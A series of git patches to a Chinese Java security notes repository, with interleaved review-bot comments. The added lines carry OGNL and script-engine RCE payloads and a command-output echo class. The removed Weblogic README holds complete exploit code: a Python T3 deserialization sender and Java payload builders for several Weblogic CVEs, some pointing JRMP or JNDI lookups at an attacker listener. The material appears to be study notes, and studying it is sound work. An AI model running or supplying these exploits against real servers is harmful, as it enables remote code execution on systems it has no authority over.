@@ -3,7 +3,11 @@ new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); +可参考s2的exp +jdk9+ +@jdk.jshell.Jshell@create().eval('code'); +${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))} ``` ## bypass sm 参考 js的bypass From 241321cb3a0e83f880ae653afc3c0c908e6af290 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 28 Apr 2022 17:35:38 +0800 Subject: [PATCH 037/332] Update Readme.md --- "java\345\233\236\346\230\276/Readme.md" | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index 7932c5c..27e1a87 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -4,6 +4,31 @@ >一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell) +### 异常回显 + +我们将命令执行的结果给Exception(result),因为Exception可以传递string,在抛出异常throw e;之后在命令执行的过程中如果目标的代码逻辑存在过程中错误抛出异常就可以看到回显内容 + +```java +import java.io.BufferedReader; +import java.io.InputStreamReader; +public class RunCheckConfig { +public RunCheckConfig(String args) throws Exception +{ +Process proc = Runtime.getRuntime().exec(args); +BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); +StringBuffer sb = new StringBuffer(); +String line; +while ((line = br.readLine()) != null) +{ +sb.append(line).append("\n"); +} +String result = sb.toString(); +Exception e=new Exception(result); +throw e; +} +} +``` +**目前暂时没有找到真实的demo.....** ### URLClassLoader抛出异常 
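Review bot: In the java回显/Readme.md hunk of PATCH 037, the paragraph under "### 异常回显" does not state the condition the technique depends on: the command output only reaches the caller when the application returns exception messages in its responses. Say that explicitly in the text, since it is also the behaviour a defender switches off (generic error pages, no exception text sent to the client). In `RunCheckConfig` the method body has lost its indentation, the `BufferedReader` is never closed (wrap it in try-with-resources), and `StringBuffer` can be `StringBuilder` because nothing here is shared across threads.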
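Review bot: In the shell/OGNL/Readme.md hunk of PATCH 036, the added lines "可参考s2的exp" and "jdk9+" are prose placed inside the existing code fence, so they render as if they were part of the expressions around them. Move them above the fence as ordinary text, or split the block into one fence per JDK range with a short heading each, and record which OGNL version the added `${(#cls = #this.getClass()...` expression was checked against.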
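Review bot: In the java日常/Readme.md hunk of PATCH 034, the added WeChat link carries `mpshare`, `scene`, `srcid`, `sharer_sharetime` and `sharer_shareid`, which describe the share action of the account that copied the link rather than the article itself. Strip those parameters before committing so the README does not publish them. The new entry also lacks the bold one-line takeaway that the neighbouring entries in this list carry.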
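Review bot: In the RASP/Readme.md hunk of PATCH 033, both added CSDN links end in a stray " 1" (`.../116211211 1` and `.../74990346 1`), which becomes part of the rendered text. Remove it, or say what the marker means. The heading change from "### 代学习" to "### 学习" also drops any to-do sense from the section; if these links are a reading backlog, "待学习" says so.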
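Review bot: In the shell/EL/Readme.md hunk of PATCH 032, the `$$BCEL$$` string under "## 加载字节码" is an encoded class with no source beside it, so a reader of the README cannot tell what the loaded class does apart from the trailing `exec('whoami')` call. Commit or link the Java source of that class and note how the encoded string was produced. The note "需要注意jdk版本问题可能没有bcel类" should name the JDK versions that still ship `com.sun.org.apache.bcel.internal.util.ClassLoader`, and the two closing lines need a blank line between them to render as separate paragraphs.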
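Review bot: In the Spring/Readme.md hunk of PATCH 031, the fenced `/%0dadmin` line has no sentence tying it to the CVE-2016-5007 entry above it. Add one line saying what the path is meant to show (Spring Security and Spring MVC matching the same request path differently) and which versions are affected, so the section is usable without opening the linked article. The three existing entries in the context lines still have empty link targets, for example `[cve-2016-4977]()`, and could be filled in with the same change.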
From 25dfebb03a8c642c2ac81e3705d613ba6bcdf940 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 10:49:59 +0800 Subject: [PATCH 038/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 476b835..a5be29a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -118,3 +118,4 @@ + 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) + 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** + 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** From 6fea755092057b777ce3400971a9420bce392d72 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 15:57:28 +0800 Subject: [PATCH 039/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a5be29a..73fc8f9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -119,3 +119,4 @@ + 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** + 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** ++ 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** From b9fca45b3b61004d0985d1760181ae4267ab0a1f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 21:34:05 +0800 Subject: [PATCH 040/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 73fc8f9..965e6a5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -120,3 +120,4 @@ + 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** + 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** ++ 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** From ac0fb771a3bb77da47d310af485818bdd69fd582 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 21:42:54 +0800 Subject: [PATCH 041/332] Update README.md --- Jboss/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Jboss/README.md b/Jboss/README.md index 0a7263d..029922c 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -4,3 +4,5 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 自己测试了网上很多工具发现不是特别好用 而且不集中。。。。 所以自己想写一个综合利用的工具。。。 + ++ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) From e467afc7ba96e18978f6cbe3b0038731b8522734 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 15:45:24 +0800 Subject: [PATCH 042/332] Update Readme.md --- Weblogic/Readme.md | 538 ++------------------------------------------- 1 file changed, 15 insertions(+), 523 deletions(-) diff --git a/Weblogic/Readme.md b/Weblogic/Readme.md index fa69759..b594381 100644 --- a/Weblogic/Readme.md +++ b/Weblogic/Readme.md 
@@ -1,539 +1,31 @@ # Weblogic ->文章内容参考:http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 -> ->为了方便自己学习 +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 -![image-20210815153940829](img/image-20210815153940829.png) +https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ +https://y4er.com/post/weblogic-jrmp/ -## CVE-2015-4852 +http://drops.xmd5.com/static/drops/web-13470.html -InboundMsgAbbrev#readobject +https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 -InboundMsgAbbrev#resolveClass +http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html +## 内存木马 +https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g +https://www.shuzhiduo.com/A/gVdnM4685W/ -从入口点开始`weblogic.rjvm.InboundMsgAbbrev#readObject`方法开始。通过`read()`方法,读取T3数据流的序列化部分依次分块解析类。`InboundMsgAbbrev#resolveClass()`内部使用`Class.forName`来从类序列化获取到对应类的一个Class的对象。进行相对应的点实例化并读取了`AnnotationInvocationHandler`触发了此处CC1的利用链。最后在`AbstractMapDecorator#entrySet()`方法触发,达到了rce目的。 +https://xz.aliyun.com/t/10323#toc-49 -https://www.cnblogs.com/0x7e/p/14529949.html +https://github.com/Y4er/WebLogic-Shiro-shell +https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/ +https://kuron3k0.github.io/2021/04/29/weblogic-memshell-2/ -主要有以下几个部分组成: +https://www.cnblogs.com/bitterz/p/14970230.html -【数据包长度】【T3协议头】【反序列化标志】【数据】 - -00 00 0d cf 是数据包长度 - -通常在反序列化数据包中,`ac ed 00 05` 是反序列化标志,在 T3 协议中由于每个反序列化数据包前面都有 `fe 01 00 00` ,所以这里的标志相当于就是 `fe 01 00 00 ac ed 00 05` - -![image-20210815001234456](img/image-20210815001234456.png) - -```python -import socket -import sys -import struct -import re -import subprocess 
-import binascii - -def get_payload1(gadget, command): - JAR_FILE = '/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar' - popen = subprocess.Popen(['java', '-jar', JAR_FILE, gadget, command], stdout=subprocess.PIPE) - return popen.stdout.read() - -def get_payload2(path): - with open(path, "rb") as f: - return f.read() - -def exp(host, port, payload): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - - handshake = "t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n".encode() - sock.sendall(handshake) - data = sock.recv(1024) - pattern = re.compile(r"HELO:(.*).false") - version = re.findall(pattern, data.decode()) - if len(version) == 0: - print("Not Weblogic") - return - - print("Weblogic {}".format(version[0])) - data_len = binascii.a2b_hex(b"00000000") #数据包长度,先占位,后面会根据实际情况重新 - t3header = binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006") #t3协议头 - flag = binascii.a2b_hex(b"fe010000") #反序列化数据标志 - payload = data_len + t3header + flag + payload - payload = struct.pack('>I', len(payload)) + payload[4:] #重新计算数据包长度 - sock.send(payload) - -if __name__ == "__main__": - host = "127.0.0.1" - port = 7001 - gadget = "CommonsCollections1" #CommonsCollections1 Jdk7u21 - command = "touch /tmp/CVE-2015-4852" - - payload = get_payload1(gadget, command) - exp(host, port, payload) -``` - -### 修复 - -补丁:2016年1月 p21984589_1036_Generic -修复方法是在resolveClass中引入了 ClassFilter.isBlackListed进行过滤,跟进weblogic.rmi.ClassFilter可以看到黑名单内容。 - -## CVE-2016-0638 - -weblogic.jms.common.StreamMessageImpl没在黑名单,在其反序列化时会读取一段数据并进行反序列化,我们可以把这段数据伪造成rce payload。 - -![image-20210815103726507](img/image-20210815103726507.png) - -乱入一个QA -Q:StreamMessageImpl可以过黑名单很好理解,但是为啥CommonsCollections1依旧可以成功,CommonsCollections1(org.apache.commons.collections.functors)不是在黑名单里面吗? 
- -A:答案是ServerChannelInputStream没有过滤到org.apache.commons.collections.functors(废话)。细节是这样的:ServerChannelInputStream的resolveClass检验到是StreamMessageImpl,不在黑名单里面,通过。然后在反序列化流程中会调用StreamMessageImpl的readExternal,readExternal内部又new了新的ObjectInputStream(以后简称ois)并从缓冲区读反序列化数据再次调用readObject,这里原生的ois就是原生的resolveClass方法没有过滤。 - -**有点类似二次反序列化利用。。** - -```java -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; - -public class CVE_2016_0638 { - - public static void main(String[] args) throws IOException { - byte[] payload = exec("CommonsCollections1", "touch /tmp/CVE_2016_0638"); - StreamMessageImpl streamMessage = new StreamMessageImpl(payload); - ser(streamMessage, "CVE_2016_0638.ser"); - } - - public static byte[] exec(String gadget, String command) throws IOException { - String[] cmd = {"java", "-jar", "/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar", gadget, command}; - InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); - - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - byte[] b = new byte[4096]; - int a = -1; - - while ((a = in.read(b)) != -1) { - baos.write(b, 0, a); - } - - return baos.toByteArray(); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2016年4月p22505423_1036_Generic -把原生的ois换成了FilteringObjectInputStream - -## CVE-2016-3510 - -weblogic.corba.utils.MarshalledObject不在黑名单中,并且在readResolve的时候会读取objBytes的值赋给新new的ois。那么我们在objBytes中放入rce payload即可。 - -![image-20210815103750342](img/image-20210815103750342.png) - -```java -import weblogic.corba.utils.MarshalledObject; -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; -import java.lang.reflect.Field; - -public class CVE_2016_3510 { - public static void main(String[] args) throws 
IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException { - byte[] payload = exec("CommonsCollections1", "touch /tmp/CVE_2016_3510"); - MarshalledObject marshalledObject = new MarshalledObject("foo"); - Class cls = marshalledObject.getClass(); - Field field = cls.getDeclaredField("objBytes"); - field.setAccessible(true); - field.set(marshalledObject, payload); - ser(marshalledObject,"./CVE_2016_3510.ser"); - } - - public static byte[] exec(String gadget, String command) throws IOException { - String[] cmd = {"java", "-jar", "/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar", gadget, command}; - InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); - - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - byte[] b = new byte[4096]; - int a = -1; - - while ((a = in.read(b)) != -1) { - baos.write(b, 0, a); - } - - return baos.toByteArray(); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2016年10月 p23743997_1036_Generic -重写了resolveClass方法,加了过滤。 - -## CVE-2017-3248 - -![image-20210815110026954](img/image-20210815110029190.png) - -通过jrmpclient去触发反序列化,然后在去连接我们的jrmplistener在触发反序列化漏洞。 - -```python -import socket -import sys -import struct -import re -import subprocess -import binascii - -def get_payload1(gadget, command): - JAR_FILE = '/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar' - popen = subprocess.Popen(['java', '-jar', JAR_FILE, gadget, command], stdout=subprocess.PIPE) - return popen.stdout.read() - -def get_payload2(path): - with open(path, "rb") as f: - return f.read() - -def exp(host, port, payload): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - - handshake = 
"t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n".encode() - sock.sendall(handshake) - data = sock.recv(1024) - pattern = re.compile(r"HELO:(.*).false") - version = re.findall(pattern, data.decode()) - if len(version) == 0: - print("Not Weblogic") - return - - print("Weblogic {}".format(version[0])) - data_len = binascii.a2b_hex(b"00000000") #数据包长度,先占位,后面会根据实际情况重新 - t3header = binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006") #t3协议头 - flag = binascii.a2b_hex(b"fe010000") #反序列化数据标志 - payload = data_len + t3header + flag + payload - payload = struct.pack('>I', len(payload)) + payload[4:] #重新计算数据包长度 - sock.send(payload) - -if __name__ == "__main__": - host = "127.0.0.1" - port = 7001 - gadget = "JRMPClient" #CommonsCollections1 Jdk7u21 JRMPClient - command = "192.168.1.3:8080" # - - payload = get_payload1(gadget, command) - exp(host, port, payload) -``` - -### 修复 - -补丁:p24667634_1036_Generic -官方的修复是新加resolveProxyClass,过滤java.rmi.registry.Registry - -## CVE-2018-2628 - -上面提到过滤了Registry,这样ysoserial中原生JRMPClient就打不了,但是仍然有多种办法bypass。 - ->这个CVE廖也提交了绕过,他的绕过是用java.rmi.activation.Activator替换java.rmi.registry.Registry,从而绕过resolveProxyClass的判断。其实这里对接口没有要求,不一定是rmi接口,随便找一个接口都行,比如java.util.Map - -直接用UnicastRef。CVE-2017-3248的构造中把UnicastRef放入了Registry,其实用UnicastRef也能在反序列化的时候发起jrmp请求。这种方法要比替换接口的干脆很多。在ysoserial中加一个JRMPClient2 - -```java -package ysoserial.payloads; - -import java.rmi.server.ObjID; -import java.util.Random; -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.PayloadTest; -import ysoserial.payloads.util.PayloadRunner; - - -@SuppressWarnings ( { - "restriction" -} ) -@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest") -@Authors({ 
Authors.MBECHLER }) -public class JRMPClient2 extends PayloadRunner implements ObjectPayload { - - public UnicastRef getObject ( final String command ) throws Exception { - - String host; - int port; - int sep = command.indexOf(':'); - if ( sep < 0 ) { - port = new Random().nextInt(65535); - host = command; - } - else { - host = command.substring(0, sep); - port = Integer.valueOf(command.substring(sep + 1)); - } - ObjID id = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint te = new TCPEndpoint(host, port); - UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); - return ref; - } - - - public static void main ( final String[] args ) throws Exception { - Thread.currentThread().setContextClassLoader(JRMPClient.class.getClassLoader()); - PayloadRunner.run(JRMPClient.class, args); - } -} -``` - -### 修复 - -补丁:2018年四月发布的p27395085_1036_Generic -UnicastRef在weblogic.utils.io.oif.WebLogicFilterConfig中加进了黑名单。 - -## CVE-2018-2893 - -streamMessageImpl + jrmp代理类绕过。先来看payload - -```java -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; -import java.lang.reflect.Proxy; -import java.rmi.registry.Registry; -import java.rmi.server.ObjID; -import java.rmi.server.RemoteObjectInvocationHandler; -import java.util.Random; - -public class CVE_2018_2893 { - public static void main(String[] args) throws IOException { - ObjID objID = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint tcpEndpoint = new TCPEndpoint("192.168.1.3", 8080); - UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false)); - RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);//通过代理 - Object object = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler); - StreamMessageImpl streamMessage = new 
StreamMessageImpl(serialize(object)); - ser(streamMessage, "CVE_2018_2893.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - - public static byte[] serialize(final Object obj) throws IOException { - final ByteArrayOutputStream out = new ByteArrayOutputStream(); - serialize(obj, out); - return out.toByteArray(); - } - - public static void serialize(final Object obj, final OutputStream out) throws IOException { - final ObjectOutputStream objOut = new ObjectOutputStream(out); - objOut.writeObject(obj); - } -} -``` - -### 修复 - -补丁:18年7月 p27919965_1036_Generic -这次修复把经过resolveClass的java.rmi.server.RemoteObjectInvocationHandler给过滤了。 - -## CVE-2018-3245 - ->根据前面的分析可知,我们只需要找一个类似java.rmi.server.RemoteObjectInvocationHandler的类进行替换,就能继续绕过了。 ->那么这个类应该满足以下条件: ->继承远程类:java.rmi.server.RemoteObject ->不在黑名单里边(java.rmi.activation. 、sun.rmi.server.) 
->随便找了一下,符合条件的挺多的: ->javax.management.remote.rmi.RMIConnectionImpl_Stub ->com.sun.jndi.rmi.registry.ReferenceWrapper_Stub ->javax.management.remote.rmi.RMIServerImpl_Stub ->sun.rmi.registry.RegistryImpl_Stub ->sun.rmi.transport.DGCImpl_Stub - -```java -import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import java.io.*; -import java.rmi.server.ObjID; -import java.util.Random; - -public class CVE_2018_3245 { - public static void main(String[] args) throws IOException { - ObjID id = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint te = new TCPEndpoint("192.168.1.3", 8080); - UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); - ReferenceWrapper_Stub wrapperStub = new ReferenceWrapper_Stub(ref); - ser(wrapperStub, "CVE_2018_3245.ser"); - - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - -} -``` - -### 修复 - -补丁:2018年8月 p28343311_1036_201808Generic -修复方法是添加更底层的java.rmi.server.RemoteObject。 - -## CVE-2018-3191 - -这个洞是jndi注入。触发点在JtaTransactionManager。 - -```java -import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager; - -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; -import java.io.ObjectOutputStream; - -public class CVE_2018_3191 { - public static void main(String[] args) throws IOException { - String jndiAddress = "rmi://192.168.1.3:1099/Exploit"; - JtaTransactionManager jtaTransactionManager = new JtaTransactionManager(); - jtaTransactionManager.setUserTransactionName(jndiAddress); - ser(jtaTransactionManager, "CVE_2018_3191.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - 
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2018年8月 p28343311_1036_Generic - - - - - -## CVE-2020-2555 - -Oracle Coherence组件存在漏洞,该组件默认集成在Weblogic12c及以上版本中(网上资料这么说的:web10.3.6也有只是默认没有启用,未验证)。 -这个漏洞和cc5的构造有异曲同工之妙,触发点在BadAttributeValueExpException#readObject 中调用toString方法。 - -**Coherence组件** - -```java -import com.tangosol.util.ValueExtractor; -import com.tangosol.util.extractor.ChainedExtractor; -import com.tangosol.util.extractor.ReflectionExtractor; -import com.tangosol.util.filter.LimitFilter; - -import javax.management.BadAttributeValueExpException; -import java.io.*; -import java.lang.reflect.Field; - -public class CVE_2020_2555 { - public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException { - //String cmd = "touch /tmp/CVE_2020_2555_12013"; - String cmd ="calc.exe"; - ValueExtractor[] valueExtractors = new ValueExtractor[]{ - new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}), - new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}), - //new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash", "-c", cmd}}) - new ReflectionExtractor("exec", new Object[]{new String[]{"cmd.exe", "/c", cmd}}) - }; - // chain - LimitFilter limitFilter = new LimitFilter(); - limitFilter.setTopAnchor(Runtime.class); - BadAttributeValueExpException expException = new BadAttributeValueExpException(null); - Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); - m_comparator.setAccessible(true); - m_comparator.set(limitFilter, new ChainedExtractor(valueExtractors)); - Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); - m_oAnchorTop.setAccessible(true); - m_oAnchorTop.set(limitFilter, Runtime.class); - Field val = expException.getClass().getDeclaredField("val"); - 
val.setAccessible(true); - val.set(expException, limitFilter); - ser(expException, "./CVE_2020_2555_12013.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - -} -``` - -### 修复 - -删了extractor.extract - -## 总结 - -参考大师傅文章梳理完一遍之后,我们得以看到整个绕过思路的全貌。笔者主观分为三个阶段。 - -- 第一阶段,CVE-2016-0638和CVE-2016-3510。利用反序列化流程中新new的原生ois绕过,只要找到了read*系列的点可以比较容易的看出来。 -- 第二阶段,cve-2017-3248到cve-2018-3191。利用jrmp、jndi带外rce,漏洞点没有在read*的代码上下文中需要多跟几步有点“pop”的感觉了。 -- 第三阶段,cve-2020-2555,需要对java的反序列化出现过知识点很熟悉(java原生类的触发点+weblogic组件中类似cc的套路),据说这个漏洞的作者也挖了很久。 - - - - - - - - - - - ->参考: -> ->https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 -> 